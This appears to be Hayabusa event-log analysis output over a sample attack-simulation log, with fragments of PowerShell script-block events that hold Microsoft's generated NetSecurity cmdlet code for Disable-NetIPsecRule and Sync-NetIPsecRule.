[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,", ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 